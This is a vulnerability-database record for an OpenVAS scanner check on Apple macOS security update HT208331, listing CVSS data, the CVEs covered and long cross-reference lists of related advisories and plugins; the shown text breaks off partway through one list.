Apple MacOSX Security Updates(HT208331)-02

2017-12-07T00:00:00

Description

This host is installed with Apple Mac OS X and is prone to multiple vulnerabilities.

{"id": "OPENVAS:1361412562310812401", "type": "openvas", "bulletinFamily": "scanner", "title": "Apple MacOSX Security Updates(HT208331)-02", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "published": "2017-12-07T00:00:00", "modified": "2019-03-18T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812401", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.apple.com/en-us/HT208331"], "cvelist": ["CVE-2017-9798", "CVE-2017-13844", "CVE-2017-13869", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13904", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13833", "CVE-2017-13867", "CVE-2017-10002", "CVE-2017-7173", "CVE-2017-7154", "CVE-2017-13862"], "lastseen": "2019-05-29T18:34:40", "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "aix", "idList": ["OPENSSL_ADVISORY24.ASC"]}, {"type": "amazon", "idList": ["ALAS-2017-896", "ALAS-2017-919", "ALAS-2018-1102", "ALAS2-2018-1102", "ALAS2-2019-1162"]}, {"type": "apple", "idList": ["APPLE:0627AF17A33B956DE48ACE757A30BFB9", "APPLE:064D138B51FD5A1569959D1A78DD6E63", "APPLE:121C0C2C932F899F870D9D5665610ED0", "APPLE:3CD8680715FC8DF4A758CC6012471868", "APPLE:5E58B6737BAA8A942A7E8E20FE61FF82", "APPLE:6951A7CE1381D5D91F753D27604DF2AD", "APPLE:B3402276360A8C507F94E26E15D465F4", "APPLE:B6838750CA6086B150DDD58EB8FAE22A", "APPLE:B7AA5B9368DE4BD135A602B017EB0259", "APPLE:C1DE780499874CA96D4F95B04F0C81AA", "APPLE:D5B2B0A52189C378A357D40438F75CF8", "APPLE:DF08A53F8B130AC7A8FE4C422F2002C9", "APPLE:F6306C158D7B30BA0A0EDD411C414BFE", "APPLE:FAC8B05FC20C773432450AA689A274D6", "APPLE:HT208112", "APPLE:HT208113", "APPLE:HT208115", "APPLE:HT208141", "APPLE:HT208142", "APPLE:HT208144", "APPLE:HT208221", "APPLE:HT208222", "APPLE:HT208325", "APPLE:HT208326", "APPLE:HT208327", "APPLE:HT208328", "APPLE:HT208331", "APPLE:HT208334"]}, {"type": "archlinux", "idList": ["ASA-201709-15", "ASA-201710-2", "ASA-201710-3", "ASA-201710-4", "ASA-201710-5", "ASA-201710-6", "ASA-201710-7", "ASA-201711-14", "ASA-201711-15", "ASA-201712-11", "ASA-201712-5", "ASA-201712-9"]}, {"type": "attackerkb", "idList": ["AKB:D0F5AA2A-4D99-41A6-9F83-6D0EA1AD01FC"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D"]}, {"type": "centos", "idList": ["CESA-2017:2882", "CESA-2017:2972", "CESA-2018:3221"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0740", "CPAI-2017-0774", "CPAI-2017-0896"]}, {"type": "chrome", "idList": ["GCSA-6993857189147290065"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:21A806FB62D8EE8039931A5D1193F96D", "CFOUNDRY:4CFCCAC7D8EED4AADC23078DD6BCE0FD", "CFOUNDRY:9243E8457D02CBA7A3505CB1E0E03739"]}, {"type": "cve", "idList": ["CVE-2017-10002", "CVE-2017-1000254", "CVE-2017-13833", "CVE-2017-13844", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13862", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13904", "CVE-2017-15422", "CVE-2017-3735", "CVE-2017-7154", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7172", "CVE-2017-7173", "CVE-2017-9798"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1102-1:511F7", "DEBIAN:DLA-1102-1:7F277", "DEBIAN:DLA-1121-1:CE806", "DEBIAN:DLA-1157-1:16CF2", "DEBIAN:DLA-1157-1:FA549", "DEBIAN:DSA-3980-1:6FBEB", "DEBIAN:DSA-3980-1:C7ED3", "DEBIAN:DSA-3992-1:192C5", "DEBIAN:DSA-3992-1:EE5A8", "DEBIAN:DSA-4017-1:88D36", "DEBIAN:DSA-4017-1:AEF53", "DEBIAN:DSA-4018-1:01441", "DEBIAN:DSA-4018-1:DD3DF", "DEBIAN:DSA-4150-1:2E864"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-1000254", "DEBIANCVE:CVE-2017-15422", "DEBIANCVE:CVE-2017-3735", "DEBIANCVE:CVE-2017-9798"]}, {"type": "exploitdb", "idList": ["EDB-ID:42745", "EDB-ID:44234"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:415A901F9BC5DABDC36EDFC6E3924DAC", "EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D"]}, {"type": "f5", "idList": ["F5:K21462542", "F5:K70084351"]}, {"type": "fedora", "idList": ["FEDORA:07E88601F374", "FEDORA:092E9605F081", "FEDORA:0F54C60BE23D", "FEDORA:2516F60DE59E", "FEDORA:2E8D96005552", "FEDORA:3ED26601CEE3", "FEDORA:4B79E60877A0", "FEDORA:5C8E66094E72", "FEDORA:5CFCF60A5875", "FEDORA:63AEC601CFBA", "FEDORA:855A9625F2AD", "FEDORA:87D78601E81F", "FEDORA:93899601DD82", "FEDORA:98315602F10D", "FEDORA:A9847604E850", "FEDORA:AEECE6075DBF", "FEDORA:B803860875BB", "FEDORA:CAFF160478EB", "FEDORA:DEA206060997", "FEDORA:EC7F86046254"]}, {"type": "freebsd", "idList": ["1D951E85-FFDB-11E7-8B91-E8E0B747A45A", "76B085E2-9D33-11E7-9260-000C292EE6B8", "9442A811-DAB3-11E7-B5AF-A4BADB2F4699", "CCACE707-A8D8-11E7-AC58-B499BAEBFEAF", "F40F07AA-C00F-11E7-AC58-B499BAEBFEAF"]}, {"type": "gentoo", "idList": ["GLSA-201710-32", "GLSA-201712-03", "GLSA-201712-04", "GLSA-201801-03"]}, {"type": "hackerone", "idList": ["H1:269568"]}, {"type": "httpd", "idList": ["HTTPD:6236A32987BAE49DFBF020477B1278DD", "HTTPD:7DDAAFDB1FD8B2E7FD36ADABA5DB6DAA"]}, {"type": "ibm", "idList": ["09C0C603EECE682CFFD6D5C27B3EAA66D128B79E9D89A33E4AF2314E9BF9995F", "0EB149242AF86C92359FD2819FE5CA2FA94AAA9A6E3A7381956968DD540CEF70", "12C657CCB040A2D71F5E7B37692A10A6A4BAA07FBFEAADA8E6F9A5BCFCFD9FAB", "18CF8F0579774C83A0D6E6D4B5456431AD2CF024AF0BD0A465437DE7A74A73F9", "1D18DE555FB91F29F8BBC3532E15A21A7A5DE61EF8C2DB29C73E6BDCF4F0E604", "1EBC77DA43FD0C2AC1B3FBFCD06096623AB926F98B7AC6367589E5222F2115BC", "21781046737819F9BECB0172803EAC75FA331A489C94879B0B9D69C572F33FCF", "298D694E8B6EFBF03FA97A7FCDBF327EA4FEEDD97CA520790177E2DF3923F9E1", "2FE62C1E3A24A2A73592656FDD830196398708E9C059617692732BA9EA6EE79C", "30F126C0FEE1D6C0436DFF1A6751EE8FDE2C7921F8AC99F5FF4DF624573C80E8", "381B76F53A26572A7C476380F44421473D669346B3F00F995B318188F2D2B793", "3851D26A1B7DF88EA8BA11EEB80A7341FC47BF9EE9F99E03682D841ED55868A9", "38CCAB39CAFB6C2CE3724A92B67DF0EB31883A90C9A3CCC11561802DAE51A944", "3D3BF59CC576F554C3F716540167D85670B56CE61C0AA690764AE05CC62E23C5", "3F709EA726EB2BD99A9BF0A52B5FBF758B042727BAB188CBB7DC446E3FE28E4C", "437063148C0599A3C3F1CECB075FB83EAFC46606410F01E39088624674767E08", "59AFB6B22B3D21FAFDC933DA29973F4C6887013B5320E839F5B0B140E8DDA7D1", "5A23BE34322F36780B2821378B1628B3331997E99E3A9C4B3B0067399EEBC3F5", "5B64BCE3EE0E68F7C1E61B0134954FDB115D5AD76AD549C8F967018D7BA777A6", "5F0A459E7C55630FE8B65EAE2894E2115CDC425C3D1639EDACE33CFA2D3E5E1F", "654F3603785F612FCB89C4655C367EC60F72994A083FCDAAF1A7F63C68137F21", "75AE9D4CB9FE02C082FC4424DBD420EA2EAC4CD4BCE0C4E376DC8DEE1119F8D3", "765EE754DDB2AFC25A4F81B453619E8DE782835F4B2ACED4DF8CE43B5D4C10B8", "7CF53FE09C7D25161BFAD59060E2F4269BC90C0B892337805721A0FE0A9BDA22", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "825B52995DBE90672BBA09CCFBDD51925814B984495E8E740D466D1C921FE61C", "86D355F68F85D65B3FD45457F96CAF7864164018AA27439D7F53F3145DFF6AB4", "8A242C548ADF3E615FE6BA32C7E6F5B2DB8B1FA250ABF2329DC20A0FB32D3700", "8A4B8F016E20BE062D275D1D7DA531E398846FA5F653F9077E943F8758AD58E1", "91C10A77460E47F53661352C6380E6E959F0A94B552C3AE3314BBEC480C0AD09", "94533C1AEDE627C97E171FC1339661B263CF1EA6678274080F922CA0E372274C", "972701C7DC1452FBCF01B7BFE4A7289076C9DC38C28E80665321248205EAAF12", "97D5F772EC68BDCD260FBB9DFB7A322AAAC657E9360305DF11F9C6A6A40D1B85", "99C4FE5226D6D4C3DFB065D997F2D2D168A50F2B090813B4AFFCC6BF971F9576", "9D892AD714895E9B8DA3E59547784D03B32EADD3AC421AB0003E3191C1AE27AD", "A4829964562D4DA75AC835389538AF91BE820F503BFE614BB74E402BC80BACA1", "B05329785ED4441E67419C72F4E8D5EFB095312F0129B7DAC17DB1F2F0780EEC", "B37FB96EE4FA4B06328DA641D49120233F6F6FC031E87E5A21A71F34BB882B42", "C31436DA6C1FDD78E2ECB68688AFD20C432119CDF718A53729D0F429AE0174AA", "C52E4F43633A26DE3EC912F6665C082BAA08696723A69DA841FA0065F135AD79", "CBAD9A5D72D7476363185541BD693344F4EEB28C6708F8A48B2849B3FD618351", "CC5089F9744A6B5AF776C8A1234A9BCA32E0798D396B5C631C8D215B02EA08AB", "CF5AE1AC4D7F12352FB77F91CC5048FC41163311A15377504B06C6A053ADC4D7", "D272B1ACFC08FB00F71DAECEAF120EF8F47B4AA0F575849F81F09FF6E35CBFB5", "DE6FC785FAEA5CDC22FA3DD95C1113BD7CE8E4668A2B0686DFF968822706AA72", "E0CAD87D2D58A2FEE5B2191470CEB1BAD189DB6A091A60BC28E6B8904753BA45", "E321CD2FAD2352A58756D698FB9F6AEEA2D5866CC41E10025794D036A188BF76", "E515D9AE5ED3FEB7BDBAF35D90286D2E963A5E50F83A19555DC0BA545BE5A8E7", "F07DB3E9DE713D6D6258FA7BB69C354916D6B592DF066F85F76143C8963BA25E", "FD48BA74DC3A1C3984E282E9336A9AAC5D63A6863D7227C72593B2FEC3CC6C79", "FEDE4F7915CF8E683DBC7AB56D68872D5740EF9C5D19FED52B140130771052A2"]}, {"type": "ics", "idList": ["ICSA-19-024-02"]}, {"type": "kaspersky", "idList": ["KLA11152", "KLA11279"]}, {"type": "kitploit", "idList": ["KITPLOIT:5052987141331551837"]}, {"type": "lenovo", "idList": ["LENOVO:PS500190-NOSID"]}, {"type": "mageia", "idList": ["MGAA-2018-0067", "MGASA-2017-0405", "MGASA-2017-0484", "MGASA-2018-0007", "MGASA-2018-0009", "MGASA-2018-0053", "MGASA-2018-0054"]}, {"type": "nessus", "idList": ["700351.PASL", "700511.PRM", "700513.PRM", "700542.PRM", "700543.PRM", "700544.PRM", "AIX_OPENSSL_ADVISORY24.NASL", "AL2_ALAS-2018-1102.NASL", "AL2_ALAS-2019-1162.NASL", "ALA_ALAS-2017-896.NASL", "ALA_ALAS-2017-919.NASL", "ALA_ALAS-2018-1102.NASL", "APACHE_2_4_28.NASL", "APPLETV_11_2.NASL", "APPLE_IOS_110_CHECK.NBIN", "APPLE_IOS_111_CHECK.NBIN", "APPLE_IOS_112_CHECK.NBIN", "CENTOS_RHSA-2017-2882.NASL", "CENTOS_RHSA-2017-2972.NASL", "CENTOS_RHSA-2018-3221.NASL", "DEBIAN_DLA-1102.NASL", "DEBIAN_DLA-1121.NASL", "DEBIAN_DLA-1157.NASL", "DEBIAN_DSA-3980.NASL", "DEBIAN_DSA-3992.NASL", "DEBIAN_DSA-4017.NASL", "DEBIAN_DSA-4018.NASL", "DEBIAN_DSA-4150.NASL", "EULEROS_SA-2017-1252.NASL", "EULEROS_SA-2017-1253.NASL", "EULEROS_SA-2017-1287.NASL", "EULEROS_SA-2017-1288.NASL", "EULEROS_SA-2018-1330.NASL", "EULEROS_SA-2018-1392.NASL", "EULEROS_SA-2018-1420.NASL", "EULEROS_SA-2019-1009.NASL", "EULEROS_SA-2019-1084.NASL", "EULEROS_SA-2019-1164.NASL", "EULEROS_SA-2019-1201.NASL", "EULEROS_SA-2019-1389.NASL", "EULEROS_SA-2019-1400.NASL", "EULEROS_SA-2019-1419.NASL", "EULEROS_SA-2019-1546.NASL", "EULEROS_SA-2019-1550.NASL", "EULEROS_SA-2019-2390.NASL", "EULEROS_SA-2019-2509.NASL", "EULEROS_SA-2020-1106.NASL", "EULEROS_SA-2020-1454.NASL", "EULEROS_SA-2020-1568.NASL", "EULEROS_SA-2020-2099.NASL", "EULEROS_SA-2021-1221.NASL", "EULEROS_SA-2021-1506.NASL", "EULEROS_SA-2021-2542.NASL", "EULEROS_SA-2021-2566.NASL", "EULEROS_SA-2021-2758.NASL", "EULEROS_SA-2021-2785.NASL", "FEDORA_2017-4CF72E2C11.NASL", "FEDORA_2017-512A6C5AAE.NASL", "FEDORA_2017-55A3247CFD.NASL", "FEDORA_2017-601B4C20A4.NASL", "FEDORA_2017-7F30914972.NASL", "FEDORA_2017-A52F252521.NASL", "FEDORA_2017-C2645AA935.NASL", "FEDORA_2017-DBEC196DD8.NASL", "FEDORA_2017-E8179C06FD.NASL", "FEDORA_2017-EA44F172E3.NASL", "FEDORA_2017-FDD3A98E8F.NASL", "FEDORA_2018-1A85045C79.NASL", "FEDORA_2018-AAFDBB5554.NASL", "FEDORA_2018-C0D3DB441F.NASL", "FEDORA_2018-E08D828ED9.NASL", "FEDORA_2018-FAFF5F661E.NASL", "FREEBSD_PKG_1D951E85FFDB11E78B91E8E0B747A45A.NASL", "FREEBSD_PKG_76B085E29D3311E79260000C292EE6B8.NASL", "FREEBSD_PKG_9442A811DAB311E7B5AFA4BADB2F4699.NASL", "FREEBSD_PKG_CCACE707A8D811E7AC58B499BAEBFEAF.NASL", "FREEBSD_PKG_F40F07AAC00F11E7AC58B499BAEBFEAF.NASL", "GENTOO_GLSA-201710-32.NASL", "GENTOO_GLSA-201712-03.NASL", "GENTOO_GLSA-201712-04.NASL", "GENTOO_GLSA-201801-03.NASL", "GOOGLE_CHROME_63_0_3239_84.NASL", "IBM_HTTP_SERVER_298437.NASL", "JUNIPER_NSM_JSA10851.NASL", "JUNIPER_SPACE_JSA_10838.NASL", "MACOSX_GOOGLE_CHROME_63_0_3239_84.NASL", "MACOSX_SECUPD2017-004.NASL", "MACOSX_SECUPD2017-005.NASL", "MACOS_10_13.NASL", "MACOS_10_13_2.NASL", "NEWSTART_CGSL_NS-SA-2019-0065_OPENSSL.NASL", "NEWSTART_CGSL_NS-SA-2019-0118_HTTPD.NASL", "OPENSSL_1_0_2M.NASL", "OPENSSL_1_1_0G.NASL", "OPENSUSE-2017-1083.NASL", "OPENSUSE-2017-1200.NASL", "OPENSUSE-2017-1324.NASL", "OPENSUSE-2017-1349.NASL", "OPENSUSE-2018-116.NASL", "OPENSUSE-2018-389.NASL", "OPENSUSE-2018-5.NASL", "OPENSUSE-2018-517.NASL", "ORACLELINUX_ELSA-2017-2882.NASL", "ORACLELINUX_ELSA-2017-2972.NASL", "ORACLELINUX_ELSA-2018-3221.NASL", "ORACLEVM_OVMSA-2019-0040.NASL", "ORACLE_E-BUSINESS_CPU_JAN_2018.NASL", "ORACLE_ENTERPRISE_MANAGER_APR_2018_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2018_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_APR_2019_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_JAN_2019_CPU.NASL", "ORACLE_HTTP_SERVER_CPU_JAN_2018.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_APR_2019.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_APR_2019.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2018_CPU.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_JAN_2018_CPU.NASL", "PFSENSE_SA-17_07.NASL", "PHOTONOS_PHSA-2017-0042.NASL", "PHOTONOS_PHSA-2017-0042_OPENSSL.NASL", "PHOTONOS_PHSA-2017-0044.NASL", "PHOTONOS_PHSA-2017-0044_CURL.NASL", "PHOTONOS_PHSA-2017-0045.NASL", "PHOTONOS_PHSA-2017-0045_CURL.NASL", "REDHAT-RHSA-2017-2882.NASL", "REDHAT-RHSA-2017-2972.NASL", "REDHAT-RHSA-2017-3113.NASL", "REDHAT-RHSA-2017-3193.NASL", "REDHAT-RHSA-2017-3194.NASL", "REDHAT-RHSA-2017-3195.NASL", "REDHAT-RHSA-2017-3240.NASL", "REDHAT-RHSA-2017-3401.NASL", "REDHAT-RHSA-2017-3476.NASL", "REDHAT-RHSA-2017-3477.NASL", "REDHAT-RHSA-2018-3221.NASL", "SECURITYCENTER_OPENSSL_1_0_2M.NASL", "SLACKWARE_SSA_2017-261-01.NASL", "SLACKWARE_SSA_2017-279-01.NASL", "SL_20171011_HTTPD_ON_SL7_X.NASL", "SL_20171019_HTTPD_ON_SL6_X.NASL", "SL_20181030_OPENSSL_ON_SL7_X.NASL", "SUN_JAVA_WEB_SERVER_7_0_27.NASL", "SUSE_SU-2017-2542-1.NASL", "SUSE_SU-2017-2718-1.NASL", "SUSE_SU-2017-2756-1.NASL", "SUSE_SU-2017-2831-1.NASL", "SUSE_SU-2017-2907-1.NASL", "SUSE_SU-2017-2981-1.NASL", "SUSE_SU-2017-3169-1.NASL", "SUSE_SU-2017-3176-1.NASL", "SUSE_SU-2018-0002-1.NASL", "SUSE_SU-2018-0053-1.NASL", "SUSE_SU-2018-0112-1.NASL", "SUSE_SU-2018-0293-1.NASL", "SUSE_SU-2018-1401-1.NASL", "SUSE_SU-2018-1401-2.NASL", "SUSE_SU-2018-1602-1.NASL", "UBUNTU_USN-3425-1.NASL", "UBUNTU_USN-3441-1.NASL", "UBUNTU_USN-3475-1.NASL", "UBUNTU_USN-3610-1.NASL", "VIRTUALBOX_5_2_6.NASL", "VIRTUOZZO_VZLSA-2017-2972.NASL", "WEB_APPLICATION_SCANNING_98913"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2017-3735"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107203", "OPENVAS:1361412562310107204", "OPENVAS:1361412562310108252", "OPENVAS:1361412562310112048", "OPENVAS:1361412562310703980", "OPENVAS:1361412562310703992", "OPENVAS:1361412562310704017", "OPENVAS:1361412562310704018", "OPENVAS:1361412562310704150", "OPENVAS:1361412562310811719", "OPENVAS:1361412562310811720", "OPENVAS:1361412562310812035", "OPENVAS:1361412562310812045", "OPENVAS:1361412562310812235", "OPENVAS:1361412562310812236", "OPENVAS:1361412562310812237", "OPENVAS:1361412562310812641", "OPENVAS:1361412562310812642", "OPENVAS:1361412562310812643", "OPENVAS:1361412562310843313", "OPENVAS:1361412562310843328", "OPENVAS:1361412562310843360", "OPENVAS:1361412562310843486", "OPENVAS:1361412562310851660", "OPENVAS:1361412562310851734", "OPENVAS:1361412562310851765", "OPENVAS:1361412562310873446", "OPENVAS:1361412562310873507", "OPENVAS:1361412562310873627", "OPENVAS:1361412562310873748", "OPENVAS:1361412562310873785", "OPENVAS:1361412562310873829", "OPENVAS:1361412562310873837", "OPENVAS:1361412562310873974", "OPENVAS:1361412562310873977", "OPENVAS:1361412562310874144", "OPENVAS:1361412562310874155", "OPENVAS:1361412562310874300", "OPENVAS:1361412562310874436", "OPENVAS:1361412562310874598", "OPENVAS:1361412562310875080", "OPENVAS:1361412562310875089", "OPENVAS:1361412562310882784", "OPENVAS:1361412562310882791", "OPENVAS:1361412562310891102", "OPENVAS:1361412562310891121", "OPENVAS:1361412562311220171252", "OPENVAS:1361412562311220171253", "OPENVAS:1361412562311220171287", "OPENVAS:1361412562311220171288", "OPENVAS:1361412562311220181330", "OPENVAS:1361412562311220181392", "OPENVAS:1361412562311220181420", "OPENVAS:1361412562311220191009", "OPENVAS:1361412562311220191084", "OPENVAS:1361412562311220191164", "OPENVAS:1361412562311220191201", "OPENVAS:1361412562311220191389", "OPENVAS:1361412562311220191400", "OPENVAS:1361412562311220191419", "OPENVAS:1361412562311220191546", "OPENVAS:1361412562311220191550", "OPENVAS:1361412562311220192390", "OPENVAS:1361412562311220192509", "OPENVAS:1361412562311220201106", "OPENVAS:1361412562311220201454", "OPENVAS:1361412562311220201568"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2018", "ORACLE:CPUAPR2018-3678067", "ORACLE:CPUAPR2019", "ORACLE:CPUAPR2019-5072813", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2018-3236628", "ORACLE:CPUJAN2019", "ORACLE:CPUJAN2019-5072801", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2017-3236622", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2018-4258247", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2019-5072835", "ORACLE:CPUJUL2021", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2018-4428296"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2882", "ELSA-2017-2972", "ELSA-2018-3221", "ELSA-2018-4187", "ELSA-2018-4267", "ELSA-2019-4581"]}, {"type": "osv", "idList": ["OSV:DLA-1102-1", "OSV:DLA-1121-1", "OSV:DLA-1157-1", "OSV:DSA-3980-1", "OSV:DSA-3992-1", "OSV:DSA-4017-1", "OSV:DSA-4018-1", "OSV:DSA-4150-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145363", "PACKETSTORM:145364", "PACKETSTORM:145876"]}, {"type": "photon", "idList": ["PHSA-2017-0002", "PHSA-2017-0045", "PHSA-2017-0077", "PHSA-2017-0084"]}, {"type": "redhat", "idList": ["RHSA-2017:2882", "RHSA-2017:2972", "RHSA-2017:3018", "RHSA-2017:3113", "RHSA-2017:3114", "RHSA-2017:3193", "RHSA-2017:3194", "RHSA-2017:3195", "RHSA-2017:3239", "RHSA-2017:3240", "RHSA-2017:3401", "RHSA-2017:3475", "RHSA-2017:3476", "RHSA-2017:3477", "RHSA-2018:2486", "RHSA-2018:3221", "RHSA-2018:3505", "RHSA-2018:3558"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-1000254", "RH:CVE-2017-15422", "RH:CVE-2017-3735", "RH:CVE-2017-9798"]}, {"type": "seebug", "idList": ["SSV:96537", "SSV:96986", "SSV:96988", "SSV:96989", "SSV:96990", "SSV:97093"]}, {"type": "slackware", "idList": ["SSA-2017-261-01", "SSA-2017-279-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:3244-1", "OPENSUSE-SU-2017:3245-1", "OPENSUSE-SU-2018:1057-1", "OPENSUSE-SU-2018:1422-1", "SUSE-SU-2017:2968-1", "SUSE-SU-2017:2981-1", "SUSE-SU-2018:0112-1"]}, {"type": "symantec", "idList": ["SMNTC-1423", "SMNTC-1457"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A5BD476BF79F7E3854840596F916518C"]}, {"type": "ubuntu", "idList": ["USN-3425-1", "USN-3425-2", "USN-3441-1", "USN-3441-2", "USN-3475-1", "USN-3610-1", "USN-3611-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-1000254", "UB:CVE-2017-15422", "UB:CVE-2017-3735", "UB:CVE-2017-9798"]}, {"type": "zdi", "idList": ["ZDI-17-925", "ZDI-18-149", "ZDI-18-151", "ZDI-18-154"]}, {"type": "zdt", "idList": ["1337DAY-ID-28573", "1337DAY-ID-28593", "1337DAY-ID-28596", "1337DAY-ID-28653", "1337DAY-ID-28745", "1337DAY-ID-29198", "1337DAY-ID-29199", "1337DAY-ID-29200", "1337DAY-ID-29201", "1337DAY-ID-29460", "1337DAY-ID-29935"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "aix", "idList": ["OPENSSL_ADVISORY24.ASC"]}, {"type": "amazon", "idList": ["ALAS-2017-896", "ALAS-2017-919", "ALAS2-2018-1102", "ALAS2-2019-1162"]}, {"type": "apple", "idList": ["APPLE:064D138B51FD5A1569959D1A78DD6E63", "APPLE:121C0C2C932F899F870D9D5665610ED0", "APPLE:3CD8680715FC8DF4A758CC6012471868", "APPLE:6951A7CE1381D5D91F753D27604DF2AD", "APPLE:B3402276360A8C507F94E26E15D465F4", "APPLE:B7AA5B9368DE4BD135A602B017EB0259", "APPLE:C1DE780499874CA96D4F95B04F0C81AA", "APPLE:D5B2B0A52189C378A357D40438F75CF8", "APPLE:F6306C158D7B30BA0A0EDD411C414BFE", "APPLE:FAC8B05FC20C773432450AA689A274D6", "APPLE:HT208141", "APPLE:HT208142", "APPLE:HT208222", "APPLE:HT208325", "APPLE:HT208326", "APPLE:HT208327", "APPLE:HT208328", "APPLE:HT208331", "APPLE:HT208334"]}, {"type": "archlinux", "idList": ["ASA-201709-15", "ASA-201710-2", "ASA-201710-3", "ASA-201710-4", "ASA-201710-5", "ASA-201710-6", "ASA-201710-7", "ASA-201711-14", "ASA-201711-15", "ASA-201712-5", "ASA-201712-9"]}, {"type": "attackerkb", "idList": ["AKB:D0F5AA2A-4D99-41A6-9F83-6D0EA1AD01FC"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D"]}, {"type": "centos", "idList": ["CESA-2017:2882", "CESA-2017:2972"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0740", "CPAI-2017-0774", "CPAI-2017-0896"]}, {"type": "chrome", "idList": ["GCSA-6993857189147290065"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:21A806FB62D8EE8039931A5D1193F96D", "CFOUNDRY:4CFCCAC7D8EED4AADC23078DD6BCE0FD", "CFOUNDRY:9243E8457D02CBA7A3505CB1E0E03739"]}, {"type": "cve", "idList": ["CVE-2017-10002", "CVE-2017-1000254", "CVE-2017-13833", "CVE-2017-13844", "CVE-2017-3735", "CVE-2017-9798"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1102-1:7F277", "DEBIAN:DLA-1121-1:CE806", "DEBIAN:DLA-1157-1:16CF2", "DEBIAN:DSA-3980-1:C7ED3", "DEBIAN:DSA-3992-1:EE5A8", "DEBIAN:DSA-4017-1:88D36", "DEBIAN:DSA-4018-1:01441", "DEBIAN:DSA-4150-1:2E864"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-9798"]}, {"type": "exploitdb", "idList": ["EDB-ID:42745"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D"]}, {"type": "f5", "idList": ["F5:K21462542", "F5:K70084351"]}, {"type": "fedora", "idList": ["FEDORA:07E88601F374", "FEDORA:092E9605F081", "FEDORA:0F54C60BE23D", "FEDORA:2516F60DE59E", "FEDORA:2E8D96005552", "FEDORA:3ED26601CEE3", "FEDORA:4B79E60877A0", "FEDORA:5C8E66094E72", "FEDORA:5CFCF60A5875", "FEDORA:63AEC601CFBA", "FEDORA:855A9625F2AD", "FEDORA:87D78601E81F", "FEDORA:93899601DD82", "FEDORA:98315602F10D", "FEDORA:A9847604E850", "FEDORA:AEECE6075DBF", "FEDORA:B803860875BB", "FEDORA:CAFF160478EB", "FEDORA:DEA206060997", "FEDORA:EC7F86046254"]}, {"type": "freebsd", "idList": ["76B085E2-9D33-11E7-9260-000C292EE6B8", "9442A811-DAB3-11E7-B5AF-A4BADB2F4699", "CCACE707-A8D8-11E7-AC58-B499BAEBFEAF"]}, {"type": "gentoo", "idList": ["GLSA-201710-32", "GLSA-201712-03", "GLSA-201712-04", "GLSA-201801-03"]}, {"type": "hackerone", "idList": ["H1:269568"]}, {"type": "httpd", "idList": ["HTTPD:7DDAAFDB1FD8B2E7FD36ADABA5DB6DAA"]}, {"type": "ibm", "idList": ["59AFB6B22B3D21FAFDC933DA29973F4C6887013B5320E839F5B0B140E8DDA7D1", "5A23BE34322F36780B2821378B1628B3331997E99E3A9C4B3B0067399EEBC3F5", "D272B1ACFC08FB00F71DAECEAF120EF8F47B4AA0F575849F81F09FF6E35CBFB5", "FEDE4F7915CF8E683DBC7AB56D68872D5740EF9C5D19FED52B140130771052A2"]}, {"type": "kaspersky", "idList": ["KLA11152"]}, {"type": "kitploit", "idList": ["KITPLOIT:5052987141331551837"]}, {"type": "lenovo", "idList": ["LENOVO:PS500190-NOSID"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED"]}, {"type": "nessus", "idList": ["ALA_ALAS-2017-896.NASL", "APPLETV_11_2.NASL", "CENTOS_RHSA-2017-2882.NASL", "CENTOS_RHSA-2017-2972.NASL", "DEBIAN_DLA-1102.NASL", "DEBIAN_DLA-1121.NASL", "DEBIAN_DLA-1157.NASL", "DEBIAN_DSA-3980.NASL", "DEBIAN_DSA-3992.NASL", 